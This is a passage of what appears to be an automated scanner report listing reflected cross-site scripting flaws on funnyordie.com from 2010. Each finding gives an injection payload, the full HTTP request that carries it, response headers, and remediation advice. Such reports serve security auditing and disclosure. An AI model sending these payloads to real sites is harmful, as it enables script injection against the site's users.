Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "499fd8afc45e8651b1b7d0742e11d15c"
X-Runtime: 562
X-Varnish: 1401118694
X-Varnish: 573896373
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:04:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123751
1.19. http://www.funnyordie.com/browse/images/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.funnyordie.com
Path:
/browse/images/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82566"-alert(1)-"93dcba1f21a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/images/all/all/most_viewed/this_month?82566"-alert(1)-"93dcba1f21a=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "e2b277ae5670aeb2d13a153a2834c2f4"
X-Runtime: 263
X-Varnish: 1401119403
X-Varnish: 573897291
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:04:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123005
1.20. http://www.funnyordie.com/browse/stories [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3697c'-alert(1)-'c25227192cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/stories?3697c'-alert(1)-'c25227192cc=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "c6a4e1b9835d35d305c65f69b772fc4f"
X-Runtime: 594
X-Varnish: 1401120827
X-Varnish: 1264353047
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:06:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:06:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127739
1.21. http://www.funnyordie.com/browse/stories [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d669b"-alert(1)-"e7b610f1771 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/stories?d669b"-alert(1)-"e7b610f1771=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "294be3a6f764e1afe43a83184acfa6d3"
X-Runtime: 748
X-Varnish: 1401120274
X-Varnish: 1264352280
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:05:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127795
1.22. http://www.funnyordie.com/browse/stories [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/stories
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a3e"><script>alert(1)</script>6ac0701d29c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/stories?91a3e"><script>alert(1)</script>6ac0701d29c=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "bd22b131d1ff045a342b5173d606bc38"
X-Runtime: 723
X-Varnish: 1401119667
X-Varnish: 573897645
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:05:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128502
1.23. http://www.funnyordie.com/browse/videos [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e58f'-alert(1)-'84896111f7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos?4e58f'-alert(1)-'84896111f7d=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "9c9959d813f990108c45dcb1ea5bddcf"
X-Runtime: 705
X-Varnish: 1401115317
X-Varnish: 573891916
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:00:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:00:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153344
1.24. http://www.funnyordie.com/browse/videos [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de59"-alert(1)-"26840832574 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos?8de59"-alert(1)-"26840832574=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "94acb170ddca961027a6e97594ce408c"
X-Runtime: 339
X-Varnish: 1401115048
X-Varnish: 573891560
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:00:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:00:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153383
1.25. http://www.funnyordie.com/browse/videos [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc5d"><script>alert(1)</script>e1d30ac31da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos?3fc5d"><script>alert(1)</script>e1d30ac31da=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "ef2e9b54a0c71fb068993097b946bb3a"
X-Runtime: 784
X-Varnish: 1401114274
X-Varnish: 573890523
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 04:59:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 04:59:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154103
1.26. http://www.funnyordie.com/browse/videos/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1492c'-alert(1)-'333dc64d28d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_recent?1492c'-alert(1)-'333dc64d28d=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "e498b524e3007f34afdbf2c2072f5d30"
X-Runtime: 520
X-Varnish: 1401117908
X-Varnish: 1264349407
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:03:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:03:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130025
1.27. http://www.funnyordie.com/browse/videos/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ca5"-alert(1)-"357ef17ac99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_recent?c3ca5"-alert(1)-"357ef17ac99=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "9defa12117f2cb5d85b8874c42dabc66"
X-Runtime: 668
X-Varnish: 1401116962
X-Varnish: 573894077
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:02:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:02:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129996
1.28. http://www.funnyordie.com/browse/videos/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c804b"><script>alert(1)</script>29491a2601b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos/all/all/most_recent?c804b"><script>alert(1)</script>29491a2601b=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "89b1ee039aa769362aaab4b5d4bd6dca"
X-Runtime: 338
X-Varnish: 1401116669
X-Varnish: 1264348054
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:02:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:02:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130750
1.29. http://www.funnyordie.com/browse/videos/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93d"><script>alert(1)</script>2134e1a5ef0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos/all/all/most_viewed?5d93d"><script>alert(1)</script>2134e1a5ef0=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "3686ff1ecfe60bc1edfe52cc25b8828e"
X-Runtime: 399
X-Varnish: 1401115709
X-Varnish: 1264347024
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:01:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:01:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154692
1.30. http://www.funnyordie.com/browse/videos/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ddd9'-alert(1)-'5822c31ef7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed?6ddd9'-alert(1)-'5822c31ef7c=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "5cf7988500582c0d1f87ba936a89d865"
X-Runtime: 362
X-Varnish: 1401116728
X-Varnish: 573893747
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:02:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:02:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153968
1.31. http://www.funnyordie.com/browse/videos/all/all/most_viewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_viewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c7e0"-alert(1)-"593eda50da4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed?3c7e0"-alert(1)-"593eda50da4=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "aed381b431cf1fa9d409558796fe731a"
X-Runtime: 435
X-Varnish: 1401116362
X-Varnish: 573893234
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:01:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:01:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153962
1.32. http://www.funnyordie.com/browse/videos/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec6eb"-alert(1)-"5ddda637d58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed/this_month?ec6eb"-alert(1)-"5ddda637d58=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "4ed38180ab6029a49a1c16a15e63d89e"
X-Runtime: 314
X-Varnish: 1401119082
X-Varnish: 573896914
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:04:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157280
1.33. http://www.funnyordie.com/browse/videos/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f96ce'-alert(1)-'99aa59495a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/all/all/most_viewed/this_month?f96ce'-alert(1)-'99aa59495a9=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "7b21daf91d31f8a40aa82450ad9c877a"
X-Runtime: 730
X-Varnish: 1401119793
X-Varnish: 573897787
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:05:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:05:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157270
<!DOCTYPE html> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="search" type="application/opensearchdescription+xml" title= ...[SNIP]... L = 'Thanks for your tweet'; } }); }); $('twitter_action_area').show(); GA.event('sharing','twitter_share','"/browse/videos/all/all/most_viewed/this_month?f96ce'-alert(1)-'99aa59495a9=1"'); }); } });
1.34. http://www.funnyordie.com/browse/videos/all/all/most_viewed/this_month [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/videos/all/all/most_viewed/this_month
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 893db"><script>alert(1)</script>e45399b77c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/videos/all/all/most_viewed/this_month?893db"><script>alert(1)</script>e45399b77c4=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "7a2d66e48aa0f67936738d45ec4faa35"
X-Runtime: 651
X-Varnish: 1401118362
X-Varnish: 1264349972
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Fri, 05 Nov 2010 05:03:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:03:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 157987
1.35. http://www.funnyordie.com/browse/words [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae644"-alert(1)-"a03828339cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words?ae644"-alert(1)-"a03828339cd=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "f6a956224c012c140166d1140df5a5e1"
X-Runtime: 380
X-Varnish: 1401121806
X-Varnish: 1264354446
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:07:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:07:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126712
1.36. http://www.funnyordie.com/browse/words [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 329cb'-alert(1)-'fde36c9fe21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words?329cb'-alert(1)-'fde36c9fe21=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "864f0aa52caa0c6da6d6c3c83d1f1047"
X-Runtime: 573
X-Varnish: 1401122093
X-Varnish: 1264354802
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/277987-prodapp1
Expires: Fri, 05 Nov 2010 05:07:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:07:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126703
1.37. http://www.funnyordie.com/browse/words [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e30"><script>alert(1)</script>6c5b3420822 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words?e2e30"><script>alert(1)</script>6c5b3420822=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "51bbd4607aef794762f566a0eca5fd7d"
X-Runtime: 882
X-Varnish: 1401121157
X-Varnish: 573899003
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:06:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127398
1.38. http://www.funnyordie.com/browse/words/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73c1b"-alert(1)-"2137999d6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/words/all/all/most_recent?73c1b"-alert(1)-"2137999d6b=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Status: 200 OK
ETag: "973d77e22e9e3fc211acf5c0b42e02c5"
X-Runtime: 532
X-Varnish: 1401119405
X-Varnish: 573897295
Served-by: 278028-prodweb1.funnyordie.com/278030-prodweb3.funnyordie.com/278006-prodapp2
Expires: Fri, 05 Nov 2010 05:04:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 05 Nov 2010 05:04:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123370
1.39. http://www.funnyordie.com/browse/words/all/all/most_recent [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.funnyordie.com
Path: /browse/words/all/all/most_recent
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f250d"><script>alert(1)</script>8475e13ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /browse/words/all/all/most_recent?f250d"><script>alert(1)</script>8475e13ad=1 HTTP/1.1
Host: www.funnyordie.com
Accept: */*
Accept-Language: en
